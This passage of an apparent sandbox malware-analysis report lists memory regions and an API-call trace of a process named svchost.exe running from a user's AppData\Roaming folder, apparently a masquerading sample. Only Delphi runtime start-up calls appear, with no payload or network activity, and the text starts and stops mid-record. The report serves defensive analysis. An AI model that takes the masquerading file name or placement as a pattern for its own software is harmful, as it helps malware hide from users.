"\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 948 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 949 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 950 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 951 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 952 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 953 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 954 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 955 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 956 start_va = 0x77780000 end_va = 0x777fafff entry_point = 0x77780000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 957 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 958 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 959 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 960 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 961 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 962 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 963 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 964 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 965 start_va = 0x8f0000 end_va = 0x1ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 966 start_va = 0x1e80000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 967 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 968 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 969 start_va = 0x1e90000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 970 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 971 start_va = 0x330000 end_va = 0x336fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 972 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 973 start_va = 0x2080000 end_va = 0x2472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 974 start_va = 0x2480000 end_va = 0x23daffff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1089 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1090 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1091 start_va = 0x2480000 end_va = 0xa480fff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1105 start_va = 0x1cf0000 end_va = 0x1d00fff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 1106 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1107 start_va = 0x650000 end_va = 0x656fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1108 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1109 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1110 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1111 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1112 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1113 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1114 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1115 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1116 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1117 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1118 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1119 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1120 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1121 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1122 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1123 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1124 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1125 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1126 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1127 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1128 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1129 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1130 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1131 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1132 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1133 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1134 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1135 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1136 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1137 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1138 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1139 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1140 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1141 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1142 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1143 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1144 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1145 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1146 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1147 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1148 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1149 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1150 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1151 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1152 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1153 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1154 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1155 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1156 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1157 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1158 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1159 start_va = 0x3f0000 end_va = 0x3f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1160 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1161 start_va = 0x650000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1162 start_va = 0x2480000 end_va = 0x274efff entry_point = 0x2480000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 66 os_tid = 0xbd0 [0147.540] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0147.541] GetKeyboardType (nTypeFlag=0) returned 4 [0147.541] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" " [0147.541] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0147.541] GetVersion () returned 0x1db10106 [0147.541] GetVersion () returned 0x1db10106 [0147.541] GetCurrentThreadId () returned 0xbd0 [0147.542] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0147.542] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0147.542] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0147.542] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0147.543] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0147.543] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" [0147.543] GetThreadLocale () returned 0x409 [0147.543] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0147.544] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe") returned 45 [0147.544] lstrcpynA (in: lpString1=0x18f8fd, lpString2="ENU", iMaxLength=219 | out: lpString1="ENU") returned="ENU" [0147.544] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0147.544] lstrcpynA (in: lpString1=0x18f8fd, lpString2="EN", iMaxLength=219 | out: lpString1="EN") returned="EN" [0147.544] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0147.544] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0147.545] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6762d8 [0147.545] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x210000 [0147.545] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6772d8 [0147.545] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0147.545] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0147.545] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0147.546] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0147.547] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0147.547] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0147.547] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0147.547] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0147.547] GetProcAddress (hModule=0x76220000, lpProcName="GetDiskFreeSpaceExA") returned 0x762b434f [0147.547] GetThreadLocale () returned 0x409 [0147.547] GetThreadLocale () returned 0x409 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0147.547] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0147.548] GetThreadLocale () returned 0x409 [0147.548] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, 